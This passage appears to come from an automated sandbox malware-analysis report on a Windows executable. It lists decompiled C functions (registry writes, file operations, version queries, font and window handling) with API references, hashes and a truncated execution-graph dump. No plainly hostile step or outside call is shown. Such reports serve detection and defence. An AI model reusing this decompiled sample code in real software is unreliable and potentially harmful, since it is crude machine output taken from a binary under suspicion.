				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x34) = E00402A85(2);
				_t18 = E00402A85(0x11);
				_t30 =  *0x423fd0; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t32 == 1) {
						E00402A85(0x23);
						_t19 = lstrlenA(0x409bf8) + 1;
					}
					if(_t32 == 4) {
						_t24 = E00402A68(3);
						 *0x409bf8 = _t24;
						_t19 = _t32;
					}
					if(_t32 == 3) {
						_t19 = E00402F71(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bf8, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t27,  *(_t37 - 0x30), 0x409bf8, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}











                0x00402367
                0x0040236c
                0x00402376
                0x00402380
                0x00402383
                0x0040238d
                0x00402393
                0x0040239d
                0x004023a4
                0x004023ac
                0x004023ba
                0x004023be
                0x004023c9
                0x004023c9
                0x004023cd
                0x004023d1
                0x004023d7
                0x004023dc
                0x004023dc
                0x004023e0
                0x004023ec
                0x004023ec
                0x00402405
                0x00402407
                0x00402407
                0x0040240a
                0x004024e0
                0x004024e0
                0x0040291d
                0x00402929

                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023A4
                • lstrlenA.KERNEL32(00409BF8,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023C4
                • RegSetValueExA.ADVAPI32(?,?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023FD
                • RegCloseKey.ADVAPI32(?,?,?,00409BF8,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024E0
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID:
                • API String ID: 1356686001-0
                • Opcode ID: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                • Instruction ID: 1ead33bacdad0c85318cdbd94ecebf1695d3cac277658b50cebc1fb2c1fe2d1b
                • Opcode Fuzzy Hash: 44def8dede3c5aed97e6aa108d3f1f6d7508e3697ad605c69ac53dd4d90f4f06
                • Instruction Fuzzy Hash: 4A116071E00109BFEB109FA1EE89EAF7A78EB54398F11403AF905B71D1D6B85D019A68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004021C8 Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E004021C8(void* __eflags) {
				void* __ebx;
				char _t34;
				CHAR* _t36;
				CHAR* _t38;
				void* _t41;

				_t38 = E00402A85(_t34);
				 *(_t41 + 8) = _t38;
				_t36 = E00402A85(0x11);
				if(E00405D9C(_t38) != 0) {
					 *(_t41 - 0x54) =  *(_t41 - 8);
					 *((intOrPtr*)(_t41 - 0x50)) = 2;
					( &(_t38[1]))[lstrlenA(_t38)] = _t34;
					( &(_t36[1]))[lstrlenA(_t36)] = _t34;
					E00405B16(_t34, _t36, 0x409bf8, 0x409bf8, 0xfffffff8);
					lstrcatA(0x409bf8, _t36);
					 *(_t41 - 0x4c) =  *(_t41 + 8);
					 *(_t41 - 0x48) = _t36;
					 *(_t41 - 0x3a) = 0x409bf8;
					 *((short*)(_t41 - 0x44)) =  *((intOrPtr*)(_t41 - 0x1c));
					E00404E9F(_t34, 0x409bf8);
					if(SHFileOperationA(_t41 - 0x54) != 0) {
						goto L1;
					}
				} else {
					L1:
					E00404E9F(0xfffffff9, _t34);
					 *((intOrPtr*)(_t41 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t41 - 4));
				return 0;
			}








                0x004021ce
                0x004021d2
                0x004021db
                0x004021e4
                0x004021f7
                0x004021fa
                0x00402207
                0x00402218
                0x0040221c
                0x00402223
                0x0040222c
                0x00402234
                0x00402237
                0x0040223a
                0x0040223e
                0x0040224f
                0x00000000
                0x00402255
                0x004021e6
                0x004021e6
                0x004021e9
                0x004026bf
                0x004026bf
                0x0040291d
                0x00402929

                APIs
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                  • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                  • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                • lstrlenA.KERNEL32 ref: 00402201
                • lstrlenA.KERNEL32(00000000), ref: 0040220B
                • lstrcatA.KERNEL32(00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402223
                • SHFileOperationA.SHELL32(?,?,00409BF8,00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402247
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ErrorFileFindModelstrlen$CloseFirstOperationlstrcat
                • String ID:
                • API String ID: 2246384517-0
                • Opcode ID: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                • Instruction ID: a3fb08b87a3da4a4acbea606a4f252bd6f521f47b87daa54263f745b893ff540
                • Opcode Fuzzy Hash: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                • Instruction Fuzzy Hash: 36119171E04215AACB10EFEA8D4498EB7B8AF45314F10813BF510F72D2DABC99418BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401F20 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E00401F20(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E00402A85(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 0x3c) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x34 = __ebp - 8;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 8, __ebp - 0x34) != 0) {
								 *(__ebp - 8) = E00405A52(__esi,  *((intOrPtr*)( *(__ebp - 8) + 8)));
								 *(__ebp - 8) = E00405A52(__edi,  *((intOrPtr*)( *(__ebp - 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                0x00401f22
                0x00401f2a
                0x00401f2f
                0x00401f34
                0x00401f38
                0x00401f3b
                0x00401f3d
                0x00401f44
                0x00401f4d
                0x00401f55
                0x00401f58
                0x00401f6d
                0x00401f73
                0x00401f86
                0x00401f8f
                0x00401f9b
                0x00401fa0
                0x00401fa0
                0x00401f86
                0x00401fa3
                0x00401bc0
                0x00401bc0
                0x00401f58
                0x0040291d
                0x00402929

                APIs
                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F2F
                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F4D
                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F66
                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F7F
                  • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                • String ID:
                • API String ID: 1404258612-0
                • Opcode ID: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                • Instruction ID: 664519773470a51a07128ab34de84be56150192837950b593d79a90dcc03585f
                • Opcode Fuzzy Hash: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                • Instruction Fuzzy Hash: 3F115EB1A00108BFDB01AFA5DD81EEEBBB8EF44344F10803AF505F21A1D7789A54DB28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E00401D68() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093bc->lfHeight =  ~(MulDiv(E00402A68(2), _t6, 0x48));
				 *0x4093cc = E00402A68(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093d3 = 1;
				 *0x4093d0 = _t11 & 0x00000001;
				 *0x4093d1 = _t11 & 0x00000002;
				 *0x4093d2 = _t11 & 0x00000004;
				E00405B16(_t18, _t24, _t26, 0x4093d8,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093bc);
				_push(_t14);
				_push(_t26);
				E00405A52();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                0x00401d76
                0x00401d8f
                0x00401d99
                0x00401d9e
                0x00401da9
                0x00401db0
                0x00401dc2
                0x00401dc8
                0x00401dcd
                0x00401dd7
                0x0040251b
                0x00401569
                0x004028c2
                0x0040291d
                0x00402929

                APIs
                • GetDC.USER32(?), ref: 00401D6F
                • GetDeviceCaps.GDI32(00000000), ref: 00401D76
                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D85
                • CreateFontIndirectA.GDI32(004093BC), ref: 00401DD7
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CapsCreateDeviceFontIndirect
                • String ID:
                • API String ID: 3272661963-0
                • Opcode ID: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                • Instruction ID: ab44fcfaedae078b8a2075b08ba9bdacc1048924ee142b10c901050df09d38a1
                • Opcode Fuzzy Hash: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                • Instruction Fuzzy Hash: C8F04471949240AFEB015BB0AE1AB9A3B689719705F145479F641B61E3C6BC19048F2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404DEF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404DEF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420518 != _t22) {
							 *0x420518 = _t22;
							E00405AF4(0x420530, 0x424000);
							E00405A52(0x424000, _t22);
							E0040140B(6);
							E00405AF4(0x424000, 0x420530);
						}
						L11:
						return CallWindowProcA( *0x420520, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040476E(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F41(0x413);
				return 0;
			}




                0x00404dfb
                0x00404e20
                0x00404e40
                0x00404e43
                0x00404e46
                0x00404e5d
                0x00404e63
                0x00404e6a
                0x00404e71
                0x00404e78
                0x00404e7d
                0x00404e83
                0x00000000
                0x00404e93
                0x00404e2d
                0x00404e80
                0x00404e80
                0x00000000
                0x00404e80
                0x00404e39
                0x00404e3b
                0x00000000
                0x00404e3b
                0x00404e01
                0x00000000
                0x00000000
                0x00404e08
                0x00000000

                APIs
                • IsWindowVisible.USER32(?), ref: 00404E25
                • CallWindowProcA.USER32 ref: 00404E93
                  • Part of subcall function 00403F41: SendMessageA.USER32 ref: 00403F53
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Window$CallMessageProcSendVisible
                • String ID:
                • API String ID: 3748168415-3916222277
                • Opcode ID: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                • Instruction ID: 29fcd441dffe1e7b6305a3cd4593f976d2a152948ddea41a7ee803b159643aa2
                • Opcode Fuzzy Hash: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                • Instruction Fuzzy Hash: B1113071600218BBDF219F91EC40A9B3769BF84765F00813AFA08691A2C7B94D91DFED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402521 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402521(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A85(0x11));
				} else {
					E00402A68(1);
					 *0x4097f8 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405A6B(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                0x00402521
                0x00402521
                0x00402524
                0x0040253f
                0x00402526
                0x00402528
                0x0040252d
                0x00402534
                0x00402546
                0x004026bf
                0x004026bf
                0x0040254c
                0x0040255e
                0x004015ae
                0x004015b0
                0x00000000
                0x004015b6
                0x004015b0
                0x0040291d
                0x00402929

                APIs
                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040253F
                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp,00000000,?,?,00000000,00000011), ref: 0040255E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileWritelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 427699356-1943935188
                • Opcode ID: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                • Instruction ID: f3470f1ba8555a22246df6218562ebca8c23e151121f121bd8a2f796b88427a7
                • Opcode Fuzzy Hash: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                • Instruction Fuzzy Hash: 97F0BE72A44241BED710EFA09E99AEF76A8CB00309F10043BB142F60C2D6FC4B419B2E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405E13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405E13(int _a4) {
				struct tagMSG _v32;
				int _t5;
				int _t9;

				_t9 = _a4;
				while(1) {
					_t5 = PeekMessageA( &_v32, 0, _t9, _t9, 1);
					if(_t5 == 0) {
						break;
					}
					DispatchMessageA( &_v32);
				}
				return _t5;
			}






                0x00405e1a
                0x00405e30
                0x00405e3a
                0x00405e3e
                0x00000000
                0x00000000
                0x00405e2a
                0x00405e2a
                0x00405e43

                APIs
                • DispatchMessageA.USER32 ref: 00405E2A
                • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00405E3A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Message$DispatchPeek
                • String ID: tCPInfo
                • API String ID: 1770753511-2120998202
                • Opcode ID: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                • Instruction ID: b418400924ad5d261256fe136df885be693c5a8b8b6dcaec19dd907e9b62b21e
                • Opcode Fuzzy Hash: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                • Instruction Fuzzy Hash: B7E08673900118A7CA10AB99DC09ECB776CDB95750F004032FA01F71C4D6B4FA018AF5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040562E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040562E(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                0x0040562f
                0x00405639
                0x0040563b
                0x00405642
                0x0040564a
                0x00000000
                0x00000000
                0x00000000
                0x0040564a
                0x0040564c
                0x00405651

                APIs
                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00405634
                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CEA,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\O1ySvN9SvL.exe,C:\Users\user\Desktop\O1ySvN9SvL.exe,80000000,00000003), ref: 00405642
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharPrevlstrlen
                • String ID: C:\Users\user\Desktop
                • API String ID: 2709904686-1246513382
                • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction ID: 55d490dd391442433e5efd6983ceb3f41bba8d4964d1e45b55f62cb9bfffce1e
                • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                • Instruction Fuzzy Hash: EBD0C7A2409EB05EF30362149C04B9F7A58DF16711F494862F544A62A1C2785C428FAD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405740 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405740(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                0x0040574c
                0x0040574e
                0x00405776
                0x0040575b
                0x00405760
                0x0040576b
                0x00000000
                0x00405788
                0x00405774
                0x00405774
                0x00000000

                APIs
                • lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405760
                • CharNextA.USER32(?), ref: 0040576E
                • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: lstrlen$CharNextlstrcmpi
                • String ID:
                • API String ID: 190613189-0
                • Opcode ID: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                • Instruction ID: aca38312d8f432cd573fb0c64364face36d8f92203a8fe78b636acf1828773cc
                • Opcode Fuzzy Hash: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                • Instruction Fuzzy Hash: 52F0A736249D51DAC2129B255C44D6B7A94EF91355F14057AF440F3180D335A815ABBB
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:8.9%
                Total number of Nodes:1636
                Total number of Limit Nodes:52
                execution_graph 12649 ea6ae0 12650 eb477c 12649->12650 12651 eb22c8 __malloc_crt 58 API calls 12650->12651 12652 eb4781 12651->12652 12655 eb48ae __commit 12652->12655 12668 eb48e9 12652->12668 12656 eb48be 12656->12655 12659 eb2248 _free 58 API calls 12656->12659 12662 eb48d1 12656->12662 12657 eb47b7 12658 eb47d7 12657->12658 12661 eb2248 _free 58 API calls 12657->12661 12658->12655 12663 eb20a9 __lock 58 API calls 12658->12663 12659->12662 12660 eaf100 ___strgtold12_l 58 API calls 12660->12655 12661->12658 12662->12660 12664 eb4806 12663->12664 12665 eb4894 12664->12665 12667 eb2248 _free 58 API calls 12664->12667 12678 eb48b3 12665->12678 12667->12665 12681 eb440b 12668->12681 12671 eb1e0d ___strgtold12_l 6 API calls 12673 eb47a8 12671->12673 12672 eb4957 IsValidCodePage 12674 eb4969 GetCPInfo 12672->12674 12675 eb490d setSBCS 12672->12675 12673->12656 12673->12657 12674->12675 12677 eb497c _memset __setmbcp_nolock 12674->12677 12675->12671 12688 eb44d8 GetCPInfo 12677->12688 12754 eb2233 LeaveCriticalSection 12678->12754 12680 eb48ba 12680->12655 12682 